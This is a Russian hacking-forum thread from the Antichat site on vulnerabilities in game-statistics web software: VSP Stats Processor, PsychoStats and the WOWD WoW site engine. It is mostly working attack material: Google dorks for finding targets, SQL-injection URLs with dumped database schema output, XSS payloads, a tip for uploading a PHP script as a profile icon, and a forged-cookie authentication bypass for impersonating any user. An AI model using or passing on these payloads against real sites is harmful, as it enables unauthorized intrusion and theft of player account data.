Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
[ Уязвимости статистики для онлайн игр ] |
16.01.2008, 16:43
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
[ Уязвимости статистики для онлайн игр ]
название: vsp stats processor
версия: 0.45 /*старше не встречал*/
dork: "powered by vsp stats processor"
тип уязвимости: SQL-injection
пути могут вариироватся
http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+and+1=1/*'&config=cfg-default.php
http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+order+by+10/*'&config=cfg-default.php
вывод
http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,8888 8,99999,10/*'&config=cfg-default.php
смотрим куда можна вывести
http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,conc at_ws(0x3a3a,version(),user(),database()),99999,10/*'&config=cfg-default.php
5.0.22::cod2stats@192.168.255.76::cod2stats
http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,conc at_ws(0x3a3a,table_schema,table_name),99999,10+fro m+information_schema.tables/*'&config=cfg-default.php
вывод красивый..смотрим.. /*красивый потому, что видно сразу весь вывод, не нужно лимитом*/
поля и таблицы системы
Cod2stats::vspawards
Cod2stats::vspeventdata1d
Cod2stats::vspeventdata2d
Cod2stats::vspgamedata
Cod2stats::vspplayerdata
Cod2stats::vspplayerprofile
Cod2stats::vspq3awardsaccuracy
Cod2stats::vspq3eventdata1d
Cod2stats::vspq3eventdata2d
Cod2stats::vspq3gamedata
Cod2stats::vspq3playerdata
Cod2stats::vspq3playerprofile
Cod2stats::vspawards::awardid
Cod2stats::vspawards::category
Cod2stats::vspawards::image
Cod2stats::vspawards::name
Cod2stats::vspawards::playerid
Cod2stats::vspawards::sqlrq
Cod2stats::vspeventdata1d::eventcategory
Cod2stats::vspeventdata1d::eventname
Cod2stats::vspeventdata1d::eventvalue
Cod2stats::vspeventdata1d::gameid
Cod2stats::vspeventdata1d::playerid
Cod2stats::vspeventdata1d::role
Cod2stats::vspeventdata1d::round
Cod2stats::vspeventdata1d::team
Cod2stats::vspeventdata2d::eventcategory
Cod2stats::vspeventdata2d::eventname
Cod2stats::vspeventdata2d::eventvalue
Cod2stats::vspeventdata2d::gameid
Cod2stats::vspeventdata2d::player2id
Cod2stats::vspeventdata2d::playerid
Cod2stats::vspeventdata2d::role
Cod2stats::vspeventdata2d::role2
Cod2stats::vspeventdata2d::round
Cod2stats::vspeventdata2d::team
Cod2stats::vspeventdata2d::team2
Cod2stats::vspgamedata::gameid
Cod2stats::vspgamedata::name
Cod2stats::vspgamedata::value
Cod2stats::vspplayerdata::dataname
Cod2stats::vspplayerdata::datano
Cod2stats::vspplayerdata::datavalue
Cod2stats::vspplayerdata::gameid
Cod2stats::vspplayerdata::playerid
Cod2stats::vspplayerprofile::deathstreak
Cod2stats::vspplayerprofile::deaths
Cod2stats::vspplayerprofile::games
Cod2stats::vspplayerprofile::killstreak
Cod2stats::vspplayerprofile::kills
Cod2stats::vspplayerprofile::playerid
Cod2stats::vspplayerprofile::playername
Cod2stats::vspplayerprofile::skill
Cod2stats::vspq3awardsaccuracy::accuracy
Cod2stats::vspq3awardsaccuracy::games
Cod2stats::vspq3awardsaccuracy::hits
Cod2stats::vspq3awardsaccuracy::playerid
Cod2stats::vspq3awardsaccuracy::playername
Cod2stats::vspq3awardsaccuracy::shots
Cod2stats::vspq3awardsaccuracy::weaponid
p.s. админки тут как таковой нет.. поэтому использовать можно для вывода других таблиц или если есть права на заливку/чтение файлов
p.p.s. используется на серверах провайдеров /*локалки и тд*/
|
|
|
16.01.2008, 23:05
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
PsychoStats
PsychoStats
Google d0rk: "Powered by PsychoStats"
[Full-disclosure] PsychoStats 3.0.6b and prior
http://PsychoStats/includes/smarty/Smarty.class.php
http://PsychoStats/server.php?newcss=styles.css&newtheme=%00
PsychoStats v3.0.6b Multiple Cross-Site Scripting Vulnerabilities
http://PsychoStats/weapons.php/%3E%22%3E%3Cscript%3Ealert(1%20%20)%3C/script%3E
ранее была ксс в логине
[SQL-injection]
Удалённый пользоваель может выполнить произвольный SQL-запрос.
Уязвимости существуют из-за:
отсутствия проверки параметра id в скрипте map.php
отсутствия проверки параметра id в скрипте weapon.php
Пример использования:
http://PsychoStats/map.php?id=3+limit+0+union+select+1,1,1,111111111, 1,1,1,1,1,1,1,2222222,1,1,1,1,1+from+mysql.user/*
http://PsychoStats/weapon.php?id=20+limit+0+union+select+1,1,1,1,1,22 22222,1,1,1,1,1,1,1,11111111,1,1,1,1,1/*
p.s. ранее выкладывалось на ачате по кмс
https://forum.antichat.ru/showpost.php?p=464066&postcount=3159
http://video.antichat.ru/file250.html
з.з.ы. более ранние версии не рассматривались
Сообщение от m0nzt3r
Там еще можно иконку заливать в профиле (Хотя я не везде видел).Так вот, вместо нее заливаем пхп скрипт ) Только не помню, называем 1.ico.php - так кажется
m0nzt3r 3.0.7б это
Последний раз редактировалось halkfild; 18.01.2008 в 00:51..
|
|
|
|
27.01.2009, 18:41
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
PsychoStats
Google d0rk: "Powered by PsychoStats"
Multiple Remote SQL Injection Vulnerabilities
PsychoStats v2.3
SQL
Код:
www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
PsychoStats v2.3.1
SQL
Код:
www.site.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
PsychoStats v2.3.3
SQL
Код:
www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Последний раз редактировалось z00MAN; 27.01.2009 в 18:44..
|
|
|
|
02.04.2009, 11:27
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
PsychoStats v3.1
XSS in PsychoStats v 3.1
PHP код:
/admin/login.php?ref="><script>alert("XSS by Gromoza")</script>
|
|
|
|
07.04.2009, 00:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
WOWD Движок сайта WoW
PHP код:
function check()
{
if(isset($_COOKIE[$this->config['site_cookie']])){
list($cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']]));
if($cookie['user_id'] < 1)return false;
$res = $this->DB->selectRow('realmd', "SELECT * FROM account WHERE `id` = ?d", $cookie['user_id']);
if($cookie['password_hash'] == $res['sha_pass_hash']){
unset($res['password']);
$this->user = $res;
return true;
}else{
return false;
}
}else{
return false;
}
}
красивая дырень 
|
|
|
|
20.06.2009, 12:47
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 54
Провел на форуме:
712174
Репутация:
17
|
|
Сообщение от chekist
WOWD Движок сайта WoW
PHP код:
function check()
{
if(isset($_COOKIE[$this->config['site_cookie']])){
list($cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']]));
if($cookie['user_id'] < 1)return false;
$res = $this->DB->selectRow('realmd', "SELECT * FROM account WHERE `id` = ?d", $cookie['user_id']);
if($cookie['password_hash'] == $res['sha_pass_hash']){
unset($res['password']);
$this->user = $res;
return true;
}else{
return false;
}
}else{
return false;
}
}
красивая дырень
Может ктониить подсказать, как ее раскрутить. Я как понял есть какая-то возможность sql-injection через куки провести, или я не так все понял?
|
|
|
|
22.06.2009, 21:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
вся фишка в @unserialize и
PHP код:
if($cookie['password_hash'] == $res['sha_pass_hash']){
этом условии
когда зарегаешся на двишке получиш подобные плюшки
Код:
wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%226106%22%3Bi%3A1%3Bs%3A40%3A%2258c3f53a0b2e80dd3c2990a8d3c691a16c78b9dd%22%3B%7D
меняеш на
Код:
wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22[тут id пользователя без квадратных скобок]%22%3Bi%3A1%3Bb%3A1%3B%7D
возможна и скуль, но слепая |
|
|
|
23.06.2009, 14:29
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 54
Провел на форуме:
712174
Репутация:
17
|
|
Спс за ответ. Можеш еще подсказать в каком файле эти строчки? Просто скачал движок, пока не нашел) Взарание спс)
Последний раз редактировалось bq1foe; 23.06.2009 в 18:32..
|
|
|
|
24.06.2009, 12:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
вроде function.php , точно не помню, а ты откуда скачал версия может быть другой
|
|
|
|
24.06.2009, 13:06
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 54
Провел на форуме:
712174
Репутация:
17
|
|
chekist, качал вроде с _http://mangos.ru/forum точнее не скажу, уже не помню. Покавыпялся в нем на сайтах, походу версий его немерено и мало кто использует встроеную в него панель управления аккаунтом, а жаль =(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
